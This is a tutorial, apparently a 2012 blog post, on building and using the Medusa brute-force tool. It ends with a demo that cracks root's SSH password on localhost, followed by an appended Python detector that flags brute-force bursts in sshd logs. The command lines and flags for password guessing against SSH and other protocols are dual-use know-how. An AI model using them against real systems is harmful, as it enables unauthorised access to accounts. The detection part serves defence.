Brute-Force Cracking: Medusa
Posted on 2012-10-2 16:13:11

Medusa supports cracking for almost all protocols.

Installation

    root@Dis9Team:/# apt-get install libssh2-1 libssh2-1-dev openssh-server  # SSH cracking support
    root@Dis9Team:/# apt-get install ncpfs  # NCPFS cracking support
    root@Dis9Team:/# apt-get install libpq-dev  # PostgreSQL cracking support
    root@Dis9Team:/# apt-get install libgcrypt11-dev libreadline6-dev libfuse-dev  # other dependencies

Download the source code:

    root@Dis9Team:/tmp# wget http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz

Compile and install

    root@Dis9Team:/tmp# tar xf medusa-2.1.1.tar.gz
    root@Dis9Team:/tmp# cd medusa-2.1.1
    root@Dis9Team:/tmp/medusa-2.1.1# ./configure --prefix=/pen/passswd/medusa
    root@Dis9Team:/tmp/medusa-2.1.1# make
    root@Dis9Team:/tmp/medusa-2.1.1# make install
    root@Dis9Team:/tmp# cd /pen/passswd/medusa/bin/
    root@Dis9Team:/pen/passswd/medusa/bin# ./medusa
    Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

    ALERT: Host information must be supplied.

    Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
      -h [TEXT]    : Target hostname or IP address
      -H [FILE]    : File containing target hostnames or IP addresses
      -u [TEXT]    : Username to test
      -U [FILE]    : File containing usernames to test
      -p [TEXT]    : Password to test
      -P [FILE]    : File containing passwords to test
      -C [FILE]    : File containing combo entries. See README for more information.
      -O [FILE]    : File to append log information to
      -e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)
      -M [TEXT]    : Name of the module to execute (without the .mod extension)
      -m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a
                     different parameter each time and they will all be sent to the module (i.e.
                     -m Param1 -m Param2, etc.)
      -d           : Dump all known modules
      -n [NUM]     : Use for non-default TCP port number
      -s           : Enable SSL
      -g [NUM]     : Give up after trying to connect for NUM seconds (default 3)
      -r [NUM]     : Sleep NUM seconds between retry attempts (default 3)
      -R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
      -c [NUM]     : Time to wait in usec to verify socket is available (default 500 usec).
      -t [NUM]     : Total number of logins to be tested concurrently
      -T [NUM]     : Total number of hosts to be tested concurrently
      -L           : Parallelize logins using one username per thread. The default is to process
                     the entire username before proceeding.
      -f           : Stop scanning host after first valid username/password found.
      -F           : Stop audit after first valid username/password found on any host.
      -b           : Suppress startup banner
      -q           : Display module's usage information
      -v [NUM]     : Verbose level [0 - 6 (more)]
      -w [NUM]     : Error debug level [0 - 10 (more)]
      -V           : Display version
      -Z [TEXT]    : Resume scan based on map of previous scan


Create a shortcut command

    root@Dis9Team:/pen/passswd/medusa/bin# ln -s /pen/passswd/medusa/bin/medusa /usr/bin/medusa


List the supported modules

    root@Dis9Team:/pen/passswd/medusa/bin# medusa -d
    Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

      Available modules in "." :

      Available modules in "/pen/passswd/medusa/lib/medusa/modules" :
        + cvs.mod : Brute force module for CVS sessions : version 2.0
        + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
        + http.mod : Brute force module for HTTP : version 2.0
        + imap.mod : Brute force module for IMAP sessions : version 2.0
        + mssql.mod : Brute force module for M$-SQL sessions : version 2.0
        + mysql.mod : Brute force module for MySQL sessions : version 2.0
        + nntp.mod : Brute force module for NNTP sessions : version 2.0
        + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
        + pop3.mod : Brute force module for POP3 sessions : version 2.0
        + postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
        + rexec.mod : Brute force module for REXEC sessions : version 2.0
        + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
        + rsh.mod : Brute force module for RSH sessions : version 2.0
        + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
        + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
        + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
        + snmp.mod : Brute force module for SNMP Community Strings : version 2.1
        + ssh.mod : Brute force module for SSH v2 sessions : version 2.0
        + telnet.mod : Brute force module for telnet sessions : version 2.0
        + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
        + vnc.mod : Brute force module for VNC sessions : version 2.1
        + web-form.mod : Brute force module for web forms : version 2.1
        + wrapper.mod : Generic Wrapper Module : version 2.0

    root@Dis9Team:/pen/passswd/medusa/bin#


View module information

    root@Dis9Team:/pen/passswd/medusa/bin# medusa -M ssh -q
    Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

    ssh.mod (2.0) JoMo-Kun <jmk@foofus.net> :: Brute force module for SSH v2 sessions

    Available module options:
      BANNER:? (Libssh client banner. Default SSH-2.0-MEDUSA.)

    Usage example: "-M ssh -m BANNER:SSH-2.0-FOOBAR"
    root@Dis9Team:/pen/passswd/medusa/bin#


Demo: cracking SSH with a custom password list

    root@Dis9Team:~# echo "123456" > pass
    root@Dis9Team:~# echo "1234567" >> pass
    root@Dis9Team:~# echo "toor" >> pass
    root@Dis9Team:~# cat pass
    123456
    1234567
    toor
    root@Dis9Team:~#


Start cracking

    root@Dis9Team:~# medusa -h 127.0.0.1 -u root -P /root/pass -M ssh -n 22
    Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

    ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (1 of 3 complete)
    ACCOUNT FOUND: [ssh] Host: 127.0.0.1 User: root Password: 123456 [SUCCESS]
    root@Dis9Team:~#


Cracking SSH with custom username and password lists

    root@Dis9Team:~# echo 1 > name
    root@Dis9Team:~# echo 12 >> name
    root@Dis9Team:~# echo root >> name
    root@Dis9Team:~# cat name
    1
    12
    root
    root@Dis9Team:~#


Start

    root@Dis9Team:~# medusa -h 127.0.0.1 -U /root/name -P /root/pass -M ssh -n 22
    Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

    ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: 1 (1 of 3, 0 complete) Password: 123456 (1 of 3 complete)
    ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: 1 (1 of 3, 0 complete) Password: 1234567 (2 of 3 complete)
    ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: 1 (1 of 3, 0 complete) Password: toor (3 of 3 complete)
    ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: 12 (2 of 3, 1 complete) Password: 123456 (1 of 3 complete)
    ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: 12 (2 of 3, 1 complete) Password: 1234567 (2 of 3 complete)
    ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: 12 (2 of 3, 1 complete) Password: toor (3 of 3 complete)
    ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (3 of 3, 2 complete) Password: 123456 (1 of 3 complete)
    ACCOUNT FOUND: [ssh] Host: 127.0.0.1 User: root Password: 123456 [SUCCESS]
    root@Dis9Team:~#


ACCOUNT FOUND: [ssh] Host: 127.0.0.1 User: root Password: 123456 [SUCCESS]



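Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one recognize a fine blade.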
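
Seen from the target, the username-list run above leaves a burst of failed SSH logins from one source followed by an accepted one. The following is an added example, not part of the original post: a sliding-window detector over sshd auth-log lines. The log lines are constructed, and the function name `detect_bruteforce`, the threshold of 5 failures in 60 seconds and the year are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample, not real logs: sshd messages (standard OpenSSH format)
# such as the user-list run above would leave on the target, plus one benign login.
SAMPLE_LOG = """\
Oct  2 16:10:01 Dis9Team sshd[2101]: Failed password for invalid user 1 from 127.0.0.1 port 51000 ssh2
Oct  2 16:10:02 Dis9Team sshd[2101]: Failed password for invalid user 1 from 127.0.0.1 port 51000 ssh2
Oct  2 16:10:03 Dis9Team sshd[2101]: Failed password for invalid user 1 from 127.0.0.1 port 51000 ssh2
Oct  2 16:10:04 Dis9Team sshd[2105]: Failed password for invalid user 12 from 127.0.0.1 port 51002 ssh2
Oct  2 16:10:05 Dis9Team sshd[2105]: Failed password for invalid user 12 from 127.0.0.1 port 51002 ssh2
Oct  2 16:10:06 Dis9Team sshd[2105]: Failed password for invalid user 12 from 127.0.0.1 port 51002 ssh2
Oct  2 16:10:07 Dis9Team sshd[2109]: Accepted password for root from 127.0.0.1 port 51004 ssh2
Oct  2 16:30:00 Dis9Team sshd[2200]: Accepted password for admin from 192.0.2.10 port 40022 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+")

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2012):
    """Flag sources with >= threshold failed logins inside a sliding window, and
    record any login accepted from a flagged source while the burst is still fresh."""
    fails = defaultdict(deque)   # src -> (timestamp, user) of recent failures
    alerts = {}                  # src -> alert record
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; `year` is an assumption of this example
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        src, user, q = m["src"], m["user"], fails[m["src"]]
        while q and ts - q[0][0] > window:   # expire failures outside the window
            q.popleft()
        if m["result"] == "Failed":
            q.append((ts, user))
            if len(q) >= threshold:
                alert = alerts.setdefault(src, {"users_tried": set(), "compromised": []})
                alert["users_tried"].update(u for _, u in q)
        elif src in alerts and q:            # success right after a failure burst
            alerts[src]["compromised"].append(user)
    return alerts

if __name__ == "__main__":
    for src, alert in detect_bruteforce(SAMPLE_LOG).items():
        print(src, sorted(alert["users_tried"]), alert["compromised"])
```

An entry in `compromised` means a password login succeeded from a source that was guessing moments earlier, so that account's credentials should be treated as exposed and rotated.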
